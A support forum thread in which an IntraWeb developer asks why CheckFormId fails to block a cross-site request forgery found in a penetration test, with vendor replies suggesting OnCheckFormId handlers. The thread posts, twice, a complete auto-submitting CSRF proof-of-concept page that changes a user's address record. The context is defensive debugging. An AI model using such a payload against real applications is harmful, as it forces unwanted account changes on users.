Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
CheckFormId not working
#1
I am still using IntraWeb 14.2.3 and have an ISAPI dll running in IIS.  We have the CheckFormId property in ServerController set to true, however it does not seem to be working.  We failed a penetration test because an html page opened in another browser tab was able to update a form within my ISAPI application while passing an invalid value for the IW_FormID_.  It is our understanding that this property is supposed to check that IW_FormID_ value and it must match in order to process successfully.  Can anyone help me or confirm whether this is a known bug?  If so and it was fixed in a newer version can you please provide the version number?  Thanks in advance.
Reply
#2
According to your response I can assume that the generated fake request was a POST request and everything else was OK, except field IW_FormID_, correct?

Have you tried to recreate the issue and debug IWForm's event OnCheckFormId? Does it trigger?
Reply
#3
Alexandre Machado Wrote:According to your response I can assume that the generated fake request was a POST request and everything else was OK, except field IW_FormID_, correct?

Have you tried to recreate the issue and debug IWForm's event OnCheckFormId? Does it trigger?

Yes it was a POST request.  I did debug it locally and the OnCheckFormId does NOT trigger!  Please advise.
Reply
#4
I'll test it and let you know, although I don't have any details of your application....
Reply
#5
Alexandre Machado Wrote:I'll test it and let you know, although I don't have any details of your application....

The following is taken from the html page that successfully "attacked" my application.  Notice the FormID is a made up value (abc123).  When this page was loaded in another tab in the browser while my application was running it successfully updated the page in my application.  I look forward to your test results.  Thank you.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form name="csrf_request" action="https://www.website.com/ISAPI.dll/$/" method="POST"> <input type="hidden" name="TXTADDR1" value="456 Fake St" />
<input type="hidden" name="TXTADDR2" value="" />
<input type="hidden" name="TXTADDR3" value="" /> <input type="hidden" name="TXTCITY" value="Anytown" /> <input type="hidden" name="TXTZIPCODE" value="53221" />
<input type="hidden" name="CBXFOREIGNADDR_CHECKBOX" value="off" />
<input type="hidden" name="TXTCOUNTRY" value="" /> <input type="hidden" name="TXTSTATE" value="WI" /> <input type="hidden" name="TXTBEGINDATE" value="12/27/2019" />
<input type="hidden" name="TXTENDDATE" value="12/28/2019" />
<input type="hidden" name="CMBLETTERDELIVERY" value="3" />
<input type="hidden" name="TXTFAX" value="" />
<input type="hidden" name="TXTEMAIL" value="" />
<input type="hidden" name="TXTASF" value="" />
<input type="hidden" name="BTTNASFCHANGE" value="" />
<input type="hidden" name="CMDUPDATE" value="" />
<input type="hidden" name="CMDCANCEL" value="" />
<input type="hidden" name="CMDELECTRONICDELIVERY" value="" />
<input type="hidden" name="CMDADDRESSUPDATE" value="" />
<input type="hidden" name="IW_FormName" value="frmTempAddrUpdate" />
<input type="hidden" name="IW_FormClass" value="TfrmTempAddrUpdate" />
<input type="hidden" name="IW_FormID_" value="abc123" />
<input type="hidden" name="IW_width" value="781" />
<input type="hidden" name="IW_height" value="739" />
<input type="hidden" name="IW_Action" value="CMDUPDATE" />
<input type="hidden" name="IW_ActionParam" value="" />
</form>
<script>csrf_request.submit()</script>
</body>
</html>
Reply
#6
rchristi12 Wrote:Any update?  If there are specific details that I did not already provide in the thread that you need please let me know.  Thanks.

Alexandre Machado Wrote:I'll test it and let you know, although I don't have any details of your application....

The following is taken from the html page that successfully "attacked" my application.  Notice the FormID is a made up value (abc123).  When this page was loaded in another tab in the browser while my application was running it successfully updated the page in my application.  I look forward to your test results.  Thank you.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form name="csrf_request" action="https://www.website.com/ISAPI.dll/$/" method="POST"> <input type="hidden" name="TXTADDR1" value="456 Fake St" />
<input type="hidden" name="TXTADDR2" value="" />
<input type="hidden" name="TXTADDR3" value="" /> <input type="hidden" name="TXTCITY" value="Anytown" /> <input type="hidden" name="TXTZIPCODE" value="53221" />
<input type="hidden" name="CBXFOREIGNADDR_CHECKBOX" value="off" />
<input type="hidden" name="TXTCOUNTRY" value="" /> <input type="hidden" name="TXTSTATE" value="WI" /> <input type="hidden" name="TXTBEGINDATE" value="12/27/2019" />
<input type="hidden" name="TXTENDDATE" value="12/28/2019" />
<input type="hidden" name="CMBLETTERDELIVERY" value="3" />
<input type="hidden" name="TXTFAX" value="" />
<input type="hidden" name="TXTEMAIL" value="" />
<input type="hidden" name="TXTASF" value="" />
<input type="hidden" name="BTTNASFCHANGE" value="" />
<input type="hidden" name="CMDUPDATE" value="" />
<input type="hidden" name="CMDCANCEL" value="" />
<input type="hidden" name="CMDELECTRONICDELIVERY" value="" />
<input type="hidden" name="CMDADDRESSUPDATE" value="" />
<input type="hidden" name="IW_FormName" value="frmTempAddrUpdate" />
<input type="hidden" name="IW_FormClass" value="TfrmTempAddrUpdate" />
<input type="hidden" name="IW_FormID_" value="abc123" />
<input type="hidden" name="IW_width" value="781" />
<input type="hidden" name="IW_height" value="739" />
<input type="hidden" name="IW_Action" value="CMDUPDATE" />
<input type="hidden" name="IW_ActionParam" value="" />
</form>
<script>csrf_request.submit()</script>
</body>
</html>
Reply
#7
Do you have an OnCheckFormId assigned? If not, please assign an event like this:

procedure TIWForm1.IWAppFormCheckFormId(Sender: TObject;
var Allow: Boolean);
begin
Allow := False;
end;

I tested here and it works as expected.
Reply
#8
I currently have the CheckFormId value in ServerController set to true. In my form I have the OnCheckForm assigned and set Allow = false as you instructed. It is hitting this code and now I receive an error "Invalid form Id" every time I try to do something on that form. It doesn't matter whether I try a CSRF attack with a different form id or simply try to use the form as it was intended which would use the existing form ID value. It always throws that error if I set allow = false and as a result I'm stuck on that form. Is there something else I am missing? Do you have a demo I can download and compare to? Thanks.
Reply
#9
So it is working, right?

The parameter "Allow" already comes with the check result. Meaning,

Inside OnCheckFormId event, if Allow is False, it means that the received ID is not correct. You can still change it to True and alllow it execute if you want it to. I recommend you to log it, though and block. That's what most users do.

Whenever you do, you must assign a OnCheckFormId to the event handler so it will block execution for that particular form.

procedure TIWForm1.IWAppFormCheckFormId(Sender: TObject; var Allow: Boolean);
begin
if not Allow then
begin
Log('execution was blocked');
end;
end;
Reply
#10
No it's not working.  It appears to ALWAYS throw an error if we set allow = false even when the form ID values are the same.  By setting it to false is that telling IntraWeb to throw an error if the form ID values don't match or do we need to manually check these values somehow in this function?  This is not clear to me.
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)